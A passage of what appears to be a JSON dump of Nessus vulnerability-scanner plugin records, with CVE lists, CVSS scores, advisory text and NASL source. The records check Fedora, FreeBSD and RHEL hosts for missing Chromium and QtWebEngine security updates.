audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"qt5-qtwebengine-5.8.0-8.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"qt5-qtwebengine\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-27T15:57:02", "description": "This update updates QtWebEngine to the 5.8.0 release. QtWebEngine 5.8.0 is part of the Qt 5.8.0 release, but only the QtWebEngine component is included in this update.\n\nThe update fixes the following security issues in QtWebEngine 5.7.1:\nCVE-2016-5182, CVE-2016-5183, CVE-2016-5189, CVE-2016-5199, CVE-2016-5201, CVE-2016-5203, CVE-2016-5204, CVE-2016-5205, CVE-2016-5206, CVE-2016-5208, CVE-2016-5207, CVE-2016-5210, CVE-2016-5211, CVE-2016-5212, CVE-2016-5213, CVE-2016-5214, CVE-2016-5215. CVE-2016-5216, CVE-2016-5217, CVE-2016-5218, CVE-2016-5219, CVE-2016-5221, CVE-2016-5222, CVE-2016-5223, CVE-2016-5224, CVE-2016-5225, CVE-2016-9650 and CVE-2016-9651.\n\nOther immediately usable changes in QtWebEngine 5.8 include :\n\n - Based on Chromium 53.0.2785.148 with security fixes from Chromium up to version 55.0.2883.75. (5.7.1 was based on Chromium 49.0.2623.111 with security fixes from Chromium up to version 54.0.2840.87.)\n\n - The `view-source:` scheme is now supported.\n\n - User scripts now support metadata (`@include`, `@exclude`, `@match`) as in Greasemonkey.\n\n - Some `chrome:` schemes now supported, for instance `chrome://gpu`.\n\n - Several bugs were fixed, see https://code.qt.io/cgit/qt/qtwebengine.git/tree/dist/cha nges-5.8.0 for details.\n\nThe following changes in QtWebEngine 5.8 require compile-time application support and will only be available after applications are rebuilt (and patched to remove the checks for Qt 5.8, because Qt is still version 5.7.1, only QtWebEngine is being updated) :\n\n - Spellchecking with a forked version of Hunspell. This Fedora package automatically converts system Hunspell dictionaries (installed by system RPMs into the systemwide location) to the Chromium `bdic` format used by QtWebEngine (using an RPM file trigger). If you wish to use dictionaries installed manually, use the included `qwebengine_convert_dict` tool. Alternatively, you can also download dictionaries directly in the Chromium `bdic` format.\n\n - Support for printing directly to a printer. (Note that QupZilla already supports printing to a printer, because it can use the printToPdf API that has existed since QtWebEngine 5.7 to print to a printer with the help of the `lpr` command-line tool. But other applications such as KMail require the new direct printing API.)\n\n - Added a setting to enable printing of CSS backgrounds.\n\nThe following new QML APIs are available to developers :\n\n - Tooltips (HTML5 global title attribute) are now also supported in the QML API.\n\n - Qt WebEngine (QML) allows defining custom dialogs / context menus.\n\n - Qt WebEngine (QML) on `eglfs` uses builtin dialogs based on Qt Quick Controls 2.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-07-17T00:00:00", "type": "nessus", "title": "Fedora 26 : qt5-qtwebengine (2017-c5b2c9a435)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5182", "CVE-2016-5183", "CVE-2016-5189", "CVE-2016-5199", "CVE-2016-5201", "CVE-2016-5203", "CVE-2016-5204", "CVE-2016-5205", "CVE-2016-5206", "CVE-2016-5207", "CVE-2016-5208", "CVE-2016-5210", "CVE-2016-5211", "CVE-2016-5212", "CVE-2016-5213", "CVE-2016-5214", "CVE-2016-5215", "CVE-2016-5216", "CVE-2016-5217", "CVE-2016-5218", "CVE-2016-5219", "CVE-2016-5221", "CVE-2016-5222", "CVE-2016-5223", "CVE-2016-5224", "CVE-2016-5225", "CVE-2016-9650", "CVE-2016-9651"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:qt5-qtwebengine", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-C5B2C9A435.NASL", "href": "https://www.tenable.com/plugins/nessus/101716", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-c5b2c9a435.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(101716);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2016-5182\", \"CVE-2016-5183\", \"CVE-2016-5189\", \"CVE-2016-5199\", \"CVE-2016-5201\", \"CVE-2016-5203\", \"CVE-2016-5204\", \"CVE-2016-5205\", \"CVE-2016-5206\", \"CVE-2016-5207\", \"CVE-2016-5208\", \"CVE-2016-5210\", \"CVE-2016-5211\", \"CVE-2016-5212\", \"CVE-2016-5213\", \"CVE-2016-5214\", \"CVE-2016-5215\", \"CVE-2016-5216\", \"CVE-2016-5217\", \"CVE-2016-5218\", \"CVE-2016-5219\", \"CVE-2016-5221\", \"CVE-2016-5222\", \"CVE-2016-5223\", \"CVE-2016-5224\", \"CVE-2016-5225\", \"CVE-2016-9650\", \"CVE-2016-9651\");\n script_xref(name:\"FEDORA\", value:\"2017-c5b2c9a435\");\n\n script_name(english:\"Fedora 26 : qt5-qtwebengine (2017-c5b2c9a435)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update updates QtWebEngine to the 5.8.0 release. QtWebEngine\n5.8.0 is part of the Qt 5.8.0 release, but only the QtWebEngine\ncomponent is included in this update.\n\nThe update fixes the following security issues in QtWebEngine 5.7.1:\nCVE-2016-5182, CVE-2016-5183, CVE-2016-5189, CVE-2016-5199,\nCVE-2016-5201, CVE-2016-5203, CVE-2016-5204, CVE-2016-5205,\nCVE-2016-5206, CVE-2016-5208, CVE-2016-5207, CVE-2016-5210,\nCVE-2016-5211, CVE-2016-5212, CVE-2016-5213, CVE-2016-5214,\nCVE-2016-5215. CVE-2016-5216, CVE-2016-5217, CVE-2016-5218,\nCVE-2016-5219, CVE-2016-5221, CVE-2016-5222, CVE-2016-5223,\nCVE-2016-5224, CVE-2016-5225, CVE-2016-9650 and CVE-2016-9651.\n\nOther immediately usable changes in QtWebEngine 5.8 include :\n\n - Based on Chromium 53.0.2785.148 with security fixes from\n Chromium up to version 55.0.2883.75. (5.7.1 was based on\n Chromium 49.0.2623.111 with security fixes from Chromium\n up to version 54.0.2840.87.)\n\n - The `view-source:` scheme is now supported.\n\n - User scripts now support metadata (`@include`,\n `@exclude`, `@match`) as in Greasemonkey.\n\n - Some `chrome:` schemes now supported, for instance\n `chrome://gpu`.\n\n - Several bugs were fixed, see\n https://code.qt.io/cgit/qt/qtwebengine.git/tree/dist/cha\n nges-5.8.0 for details.\n\nThe following changes in QtWebEngine 5.8 require compile-time\napplication support and will only be available after applications are\nrebuilt (and patched to remove the checks for Qt 5.8, because Qt is\nstill version 5.7.1, only QtWebEngine is being updated) :\n\n - Spellchecking with a forked version of Hunspell. This\n Fedora package automatically converts system Hunspell\n dictionaries (installed by system RPMs into the\n systemwide location) to the Chromium `bdic` format used\n by QtWebEngine (using an RPM file trigger). If you wish\n to use dictionaries installed manually, use the included\n `qwebengine_convert_dict` tool. Alternatively, you can\n also download dictionaries directly in the Chromium\n `bdic` format.\n\n - Support for printing directly to a printer. (Note that\n QupZilla already supports printing to a printer, because\n it can use the printToPdf API that has existed since\n QtWebEngine 5.7 to print to a printer with the help of\n the `lpr` command-line tool. But other applications such\n as KMail require the new direct printing API.)\n\n - Added a setting to enable printing of CSS backgrounds.\n\nThe following new QML APIs are available to developers :\n\n - Tooltips (HTML5 global title attribute) are now also\n supported in the QML API.\n\n - Qt WebEngine (QML) allows defining custom dialogs /\n context menus.\n\n - Qt WebEngine (QML) on `eglfs` uses builtin dialogs based\n on Qt Quick Controls 2.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-c5b2c9a435\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://code.qt.io/cgit/qt/qtwebengine.git/tree/dist/changes-5.8.0\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected qt5-qtwebengine package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:qt5-qtwebengine\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/07/17\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"qt5-qtwebengine-5.8.0-8.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"qt5-qtwebengine\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-13T15:49:37", "description": "Google Chrome Releases reports :\n\n36 security fixes in this release\n\nPlease reference CVE/URL list for details", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-12-06T00:00:00", "type": "nessus", "title": "FreeBSD : chromium -- multiple vulnerabilities (603fe0a1-bb26-11e6-8e5a-3065ec8fd3ec)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5203", "CVE-2016-5204", "CVE-2016-5205", "CVE-2016-5206", "CVE-2016-5207", "CVE-2016-5208", "CVE-2016-5209", "CVE-2016-5210", "CVE-2016-5211", "CVE-2016-5212", "CVE-2016-5213", "CVE-2016-5214", "CVE-2016-5215", "CVE-2016-5216", "CVE-2016-5217", "CVE-2016-5218", "CVE-2016-5219", "CVE-2016-5220", "CVE-2016-5221", "CVE-2016-5222", "CVE-2016-5223", "CVE-2016-5224", "CVE-2016-5225", "CVE-2016-5226", "CVE-2016-9650", "CVE-2016-9651", "CVE-2016-9652"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:chromium", "p-cpe:/a:freebsd:freebsd:chromium-npapi", "p-cpe:/a:freebsd:freebsd:chromium-pulse", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_603FE0A1BB2611E68E5A3065EC8FD3EC.NASL", "href": "https://www.tenable.com/plugins/nessus/95546", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(95546);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2016-5203\", \"CVE-2016-5204\", \"CVE-2016-5205\", \"CVE-2016-5206\", \"CVE-2016-5207\", \"CVE-2016-5208\", \"CVE-2016-5209\", \"CVE-2016-5210\", \"CVE-2016-5211\", \"CVE-2016-5212\", \"CVE-2016-5213\", \"CVE-2016-5214\", \"CVE-2016-5215\", \"CVE-2016-5216\", \"CVE-2016-5217\", \"CVE-2016-5218\", \"CVE-2016-5219\", \"CVE-2016-5220\", \"CVE-2016-5221\", \"CVE-2016-5222\", \"CVE-2016-5223\", \"CVE-2016-5224\", \"CVE-2016-5225\", \"CVE-2016-5226\", \"CVE-2016-9650\", \"CVE-2016-9651\", \"CVE-2016-9652\");\n\n script_name(english:\"FreeBSD : chromium -- multiple vulnerabilities (603fe0a1-bb26-11e6-8e5a-3065ec8fd3ec)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Google Chrome Releases reports :\n\n36 security fixes in this release\n\nPlease reference CVE/URL list for details\"\n );\n # https://googlechromereleases.blogspot.nl/2016/12/stable-channel-update-for-desktop.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?8c43db9d\"\n );\n # https://vuxml.freebsd.org/freebsd/603fe0a1-bb26-11e6-8e5a-3065ec8fd3ec.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?494cb236\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium-npapi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:chromium-pulse\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/12/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/12/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/12/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"chromium<55.0.2883.75\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"chromium-npapi<55.0.2883.75\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"chromium-pulse<55.0.2883.75\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-13T15:49:45", "description": "An update for chromium-browser is now available for Red Hat Enterprise Linux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 55.0.2883.75.\n\nSecurity Fix(es) :\n\n* Multiple flaws were found in the processing of malformed web content. A web page containing malicious content could cause Chromium to crash, execute arbitrary code, or disclose sensitive information when visited by the victim. (CVE-2016-5203, CVE-2016-5204, CVE-2016-5205, CVE-2016-5206, CVE-2016-5207, CVE-2016-5208, CVE-2016-5209, CVE-2016-5210, CVE-2016-5211, CVE-2016-5212, CVE-2016-5213, CVE-2016-9651, CVE-2016-9652, CVE-2016-5214, CVE-2016-5215, CVE-2016-5216, CVE-2016-5217, CVE-2016-5218, CVE-2016-5219, CVE-2016-5220, CVE-2016-5221, CVE-2016-5222, CVE-2016-5223, CVE-2016-5224, CVE-2016-5225, CVE-2016-5226, CVE-2016-9650)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-12-08T00:00:00", "type": "nessus", "title": "RHEL 6 : chromium-browser (RHSA-2016:2919)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-5203", "CVE-2016-5204", "CVE-2016-5205", "CVE-2016-5206", "CVE-2016-5207", "CVE-2016-5208", "CVE-2016-5209", "CVE-2016-5210", "CVE-2016-5211", "CVE-2016-5212", "CVE-2016-5213", "CVE-2016-5214", "CVE-2016-5215", "CVE-2016-5216", "CVE-2016-5217", "CVE-2016-5218", "CVE-2016-5219", "CVE-2016-5220", "CVE-2016-5221", "CVE-2016-5222", "CVE-2016-5223", "CVE-2016-5224", "CVE-2016-5225", "CVE-2016-5226", "CVE-2016-9650", "CVE-2016-9651", "CVE-2016-9652"], "modified": "2020-05-29T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:chromium-browser", "p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2016-2919.NASL", "href": "https://www.tenable.com/plugins/nessus/95622", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:2919. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95622);\n script_version(\"3.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/29\");\n\n script_cve_id(\"CVE-2016-5203\", \"CVE-2016-5204\", \"CVE-2016-5205\", \"CVE-2016-5206\", \"CVE-2016-5207\", \"CVE-2016-5208\", \"CVE-2016-5209\", \"CVE-2016-5210\", \"CVE-2016-5211\", \"CVE-2016-5212\", \"CVE-2016-5213\", \"CVE-2016-5214\", \"CVE-2016-5215\", \"CVE-2016-5216\", \"CVE-2016-5217\", \"CVE-2016-5218\", \"CVE-2016-5219\", \"CVE-2016-5220\", \"CVE-2016-5221\", \"CVE-2016-5222\", \"CVE-2016-5223\", \"CVE-2016-5224\", \"CVE-2016-5225\", \"CVE-2016-5226\", \"CVE-2016-9650\", \"CVE-2016-9651\", \"CVE-2016-9652\");\n script_xref(name:\"RHSA\", value:\"2016:2919\");\n\n script_name(english:\"RHEL 6 : chromium-browser (RHSA-2016:2919)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"An update for chromium-browser is now available for Red Hat Enterprise\nLinux 6 Supplementary.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nChromium is an open source web browser, powered by WebKit (Blink).\n\nThis update upgrades Chromium to version 55.0.2883.75.\n\nSecurity Fix(es) :\n\n* Multiple flaws were found in the processing of malformed web\ncontent. A web page containing malicious content could cause Chromium\nto crash, execute arbitrary code, or disclose sensitive information\nwhen visited by the victim. (CVE-2016-5203, CVE-2016-5204,\nCVE-2016-5205, CVE-2016-5206, CVE-2016-5207, CVE-2016-5208,\nCVE-2016-5209, CVE-2016-5210, CVE-2016-5211, CVE-2016-5212,\nCVE-2016-5213, CVE-2016-9651, CVE-2016-9652, CVE-2016-5214,\nCVE-2016-5215, CVE-2016-5216, CVE-2016-5217, CVE-2016-5218,\nCVE-2016-5219, CVE-2016-5220, CVE-2016-5221, CVE-2016-5222,\nCVE-2016-5223, CVE-2016-5224, CVE-2016-5225, CVE-2016-5226,\nCVE-2016-9650)\"\n );\n # https://googlechromereleases.blogspot.com/2016/12/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://chromereleases.googleblog.com/2016/12/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:2919\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5203\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5204\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5205\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5206\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5207\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5208\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5209\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5210\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5211\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5212\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5213\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5214\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5215\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5216\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5217\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5218\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5219\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5220\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5221\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5222\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5223\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5224\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5225\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5226\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-9650\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-9651\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-9652\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Update the affected chromium-browser and / or\nchromium-browser-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:chromium-browser-debuginfo\");\n 